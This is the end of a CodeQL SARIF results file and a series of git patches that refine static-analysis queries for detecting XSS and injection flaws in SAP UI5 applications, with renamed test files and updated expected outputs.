value"}},{"id":20,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":21,"startColumn":29,"endColumn":50}},"message":{"text":"user-provided value"}},{"id":21,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":31,"startColumn":29,"endColumn":68}},"message":{"text":"user-provided value"}},{"id":22,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":31,"startColumn":29,"endColumn":50}},"message":{"text":"user-provided value"}},{"id":23,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":8,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":24,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":8,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":25,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":9,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":26,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":9,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":27,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":23,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":28,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":23,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":29,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":24,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":30,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":24,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":31,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":37,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":32,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":37,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":33,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":38,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":34,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":38,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":35,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":52,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":36,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":52,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":37,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":53,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":38,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":53,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":39,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":7,"startColumn":28,"endColumn":66}},"message":{"text":"user-provided value"}},{"id":40,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":7,"startColumn":28,"endColumn":49}},"message":{"text":"user-provided value"}},{"id":41,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":16,"startColumn":28,"endColumn":66}},"message":{"text":"user-provided value"}},{"id":42,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":16,"startColumn":28,"endColumn":49}},"message":{"text":"user-provided value"}},{"id":43,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":1,"startColumn":19,"endColumn":33}},"message":{"text":"user-provided value"}},{"id":44,"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3},"region":{"startLine":5,"startColumn":17,"endColumn":33}},"message":{"text":"user-provided value"}},{"id":45,"physicalLocation":{"artifactLocation":{"uri":"file:/opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/javascript/tools/data/externs/web/window.js","index":648},"region":{"startLine":56,"startColumn":5,"endColumn":13}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":18,"endColumn":38}}}]},{"ruleId":"js/xsjs-disabled-csrf-protection","rule":{"id":"js/xsjs-disabled-csrf-protection","index":5,"toolComponent":{"index":9}},"message":{"text":"CSRF protection is missing from the configuration."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/exposed/.xsaccess","uriBaseId":"%SRCROOT%","index":637},"region":{"startLine":1,"endLine":4,"endColumn":2}}}],"partialFingerprints":{"primaryLocationLineHash":"c1675fd626f895bf:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/xsjs-disabled-csrf-protection","rule":{"id":"js/xsjs-disabled-csrf-protection","index":5,"toolComponent":{"index":9}},"message":{"text":"CSRF protection should not be disabled."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/xs-app.json","uriBaseId":"%SRCROOT%","index":640},"region":{"startLine":14,"startColumn":31,"endColumn":36}}}],"partialFingerprints":{"primaryLocationLineHash":"c66a379bed25dd74:1","primaryLocationStartColumnFingerprint":"18"}}],"newlineSequences":["\r\n","\n","
","
"],"columnKind":"utf16CodeUnits","properties":{"semmle.formatSpecifier":"sarif-latest","metricResults":[{"rule":{"id":"js/summary/lines-of-user-code","index":100,"toolComponent":{"index":1}},"ruleId":"js/summary/lines-of-user-code","value":18238,"baseline":12111},{"rule":{"id":"js/summary/lines-of-code","index":101,"toolComponent":{"index":1}},"ruleId":"js/summary/lines-of-code","value":26653}],"codeqlConfigSummary":{"disableDefaultQueries":false,"queries":[{"type":"builtinSuite","uses":"security-extended"},{"type":"localQuery","uses":"./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls"},{"type":"localQuery","uses":"./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls"},{"type":"localQuery","uses":"./javascript/frameworks/xsjs/src/codeql-suites/javascript-security-extended.qls"}]},"jobRunUuid":"9c594b4b-bd36-434c-b3e4-6ef52cf709f7"}}]}
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll
index 86e657e4a..fb402f06e 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll
@@ -17,7 +17,7 @@ class FragmentLoad extends InvokeNode, MethodCallNode {
     or
     exists(RequiredObject requiredModule, SapDefineModule sapModule |
       this = requiredModule.asSourceNode().getAMemberCall("load") and
-      //ensure it is an sap module define
+      /* ensure it is an sap module define */
       requiredModule.getEnclosingFunction() = sapModule.getArgument(1)
     )
   }
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
index 48bc001f2..3f3c48e69 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
@@ -186,17 +186,6 @@ predicate isBuiltInControl(string qualifiedTypeUri) {
   )
 }
 
-/**
- * A UI5 Fragment that might include XSS sources and sinks in standard controls.
- */
-abstract class UI5Fragment extends File {
-  abstract UI5Control getControl();
-
-  abstract UI5BindingPath getASource();
-
-  abstract UI5BindingPath getAnHtmlISink();
-}
-
 /**
  * A UI5 View that might include XSS sources and sinks in standard controls.
  */
@@ -716,16 +705,7 @@ class XmlFragment extends UI5View instanceof XmlFile {
       type = result.getControlTypeName() and
       ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection", _) and
       property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
-      result.getBindingTarget() = control.getAttribute(property) and
-      /* If the control is an `sap.ui.core.HTML` then the control should be missing the `sanitizeContent` attribute */
-      (
-        getASuperType(type) = "HTMLControl"
-        implies
-        (
-          not exists(control.getAttribute("sanitizeContent")) or
-          control.getAttribute("sanitizeContent").getValue() = "false"
-        )
-      )
+      result.getBindingTarget() = control.getAttribute(property)
     )
   }
 

From af9af3d90e862676afdce6e911a3785834c096c4 Mon Sep 17 00:00:00 2001
From: Kristen Newbury <knewbury01@github.com>
Date: Thu, 8 Jan 2026 15:18:57 -0500
Subject: [PATCH 13/15] Fix testcase naming for views in view files

---
 .../ui5/test/models/sink/UI5ViewSinkTest.expected           | 6 +++---
 .../ui5/test/models/sink/{sink1.xml => sink1.view.xml}      | 0
 2 files changed, 3 insertions(+), 3 deletions(-)
 rename javascript/frameworks/ui5/test/models/sink/{sink1.xml => sink1.view.xml} (100%)

diff --git a/javascript/frameworks/ui5/test/models/sink/UI5ViewSinkTest.expected b/javascript/frameworks/ui5/test/models/sink/UI5ViewSinkTest.expected
index 9bdb6d6b0..c1797c8dc 100644
--- a/javascript/frameworks/ui5/test/models/sink/UI5ViewSinkTest.expected
+++ b/javascript/frameworks/ui5/test/models/sink/UI5ViewSinkTest.expected
@@ -1,3 +1,3 @@
-| sink1.xml:7:5:7:68 | content={path: '/input'} | The binding path `content={path: '/input'}` is an HTML injection sink. |
-| sink1.xml:8:5:8:44 | content={path: '/input'} | The binding path `content={path: '/input'}` is an HTML injection sink. |
-| sink1.xml:10:5:10:73 | value={path: '/input'} | The binding path `value={path: '/input'}` is an HTML injection sink. |
+| sink1.view.xml:7:5:7:68 | content={path: '/input'} | The binding path `content={path: '/input'}` is an HTML injection sink. |
+| sink1.view.xml:8:5:8:44 | content={path: '/input'} | The binding path `content={path: '/input'}` is an HTML injection sink. |
+| sink1.view.xml:10:5:10:73 | value={path: '/input'} | The binding path `value={path: '/input'}` is an HTML injection sink. |
diff --git a/javascript/frameworks/ui5/test/models/sink/sink1.xml b/javascript/frameworks/ui5/test/models/sink/sink1.view.xml
similarity index 100%
rename from javascript/frameworks/ui5/test/models/sink/sink1.xml
rename to javascript/frameworks/ui5/test/models/sink/sink1.view.xml

From e2517256f16cdc6839960431b6a3fb0ac5af4e6b Mon Sep 17 00:00:00 2001
From: Kristen Newbury <knewbury01@github.com>
Date: Thu, 8 Jan 2026 15:28:29 -0500
Subject: [PATCH 14/15] Update expected file for xss-urlparams-jsonmodel after
 known model update

---
 .../queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.expected     | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.expected b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.expected
index a1d1cf638..f2902f995 100644
--- a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.expected
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.expected
@@ -29,8 +29,5 @@ edges
 | webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} | webapp/controller/Display.controller.js:19:17:19:45 | remoteP ... Payload |
 #select
 | webapp/controller/Display.controller.js:14:51:14:85 | "<div>" ... </div>" | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | webapp/controller/Display.controller.js:14:51:14:85 | "<div>" ... </div>" | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | user-provided value |
-| webapp/controller/Display.controller.js:14:51:14:85 | "<div>" ... </div>" | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | webapp/controller/Display.controller.js:14:51:14:85 | "<div>" ... </div>" | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | user-provided value |
 | webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | user-provided value |
-| webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | user-provided value |
 | webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | user-provided value |
-| webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | user-provided value |

From 86fd7d506a8eb37a7f1d8755080b37abe831189e Mon Sep 17 00:00:00 2001
From: Kristen Newbury <knewbury01@github.com>
Date: Wed, 21 Jan 2026 16:23:46 -0500
Subject: [PATCH 15/15] Add modelling for binding paths and default models when
 those are used through fragments

---
 .../javascript/frameworks/ui5/Bindings.qll    | 18 ++++++++++++++++++
 .../javascript/frameworks/ui5/Fragment.qll    |  5 +++++
 .../frameworks/ui5/RemoteFlowSources.qll      | 19 +++++++++++++++++++
 .../javascript/frameworks/ui5/UI5View.qll     | 18 ++++++++++++++++++
 4 files changed, 60 insertions(+)

diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll
index b00acbba9..f75e5cba9 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll
@@ -597,6 +597,8 @@ class BindingTarget extends TBindingTarget {
         this = TLateJavaScriptBindingTarget(target, _)
         or
         this = TEarlyJavaScriptPropertyBindingTarget(target, _)
+        or
+        this = TLateJavaScriptBindingTarget(target.(BindElementMethodCallNode).getReceiver(), _)
       ) and
       result = target
     )
@@ -727,6 +729,22 @@ class Binding extends TBinding {
     )
   }
 
+  DataFlow::Node asDataFlowNode() {
+    exists(DataFlow::Node target |
+      (
+        this = TEarlyJavaScriptPropertyBinding(_, target)
+        or
+        this = TLateJavaScriptPropertyBinding(_, target)
+        or
+        exists(BindElementMethodCallNode bindElementCall |
+          target = bindElementCall.getReceiver() and
+          this = TLateJavaScriptContextBinding(bindElementCall, _)
+        )
+      ) and
+      result = target
+    )
+  }
+
   BindingPath getBindingPath() { result.getBinding() = this }
 
   BindingTarget getBindingTarget() { result.getBinding() = this }
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll
index fb402f06e..2f30d6590 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll
@@ -48,4 +48,9 @@ class FragmentLoad extends InvokeNode, MethodCallNode {
       result = config.getAPropertyWrite("controller").getRhs()
     )
   }
+
+  DataFlow::ParameterNode getCallbackObjectReference() {
+    //the load invoke node is actually just a part of the chained load.then.bind
+    result = this.getAMemberCall(_).getABoundCallbackParameter(_, _)
+  }
 }
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
index 124526b7e..dc647d3a4 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
@@ -110,6 +110,25 @@ abstract class UI5ExternalModel extends UI5Model, RemoteFlowSource {
   abstract string getName();
 }
 
+/** Default model which gains content from an SAP OData service (ie no model name is explicitly specified). */
+class DefaultODataServiceModel extends UI5ExternalModel {
+  DefaultODataServiceModel() {
+    exists(ExternalModelManifest model |
+      //an OData default model exists
+      model.getName() = "" and
+      model.getDataSource() instanceof ODataDataSourceManifest and
+      //therefore the bindElement calls that exist may be sources and also approximates the model itself
+      this.getCalleeName() = "bindElement"
+    )
+  }
+
+  override string getSourceType() { result = "DefaultODataServiceModel" }
+
+  override string getName() { result = "" }
+
+  Binding asBinding() { result.getBindingTarget().asDataFlowNode() = this }
+}
+
 /** Model which gains content from an SAP OData service. */
 class ODataServiceModel extends UI5ExternalModel {
   string modelName;
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
index 3f3c48e69..bfe65754b 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
@@ -132,6 +132,24 @@ abstract class UI5BindingPath extends BindingPath {
         not exists(controlSetModelCall.getArgument(1)) and
         not exists(this.getModelName())
       )
+      or
+      /* 5.  There is no call to `setModel` at all and a default model exists that is related to the binding path this refers to */
+      exists(DefaultODataServiceModel defaultModel |
+        result = defaultModel and
+        not exists(MethodCallNode viewSetModelCall | viewSetModelCall.getMethodName() = "setModel") and
+        /*
+         * this binding path can occur in a fragment that is the receiver object for the bindElement model approximation
+         * i.e. checks that the default model is relevant
+         */
+
+        exists(FragmentLoad load |
+          load.getCallbackObjectReference().flowsTo(defaultModel.asBinding().asDataFlowNode()) and
+          load.getNameArgument()
+              .getStringValue()
+              .matches("%" +
+                  this.getLocation().getFile().getBaseName().replaceAll(".fragment.xml", "") + "%")
+        )
+      )
     )
     // and
     // /* This binding path and the resulting model should live inside the same webapp */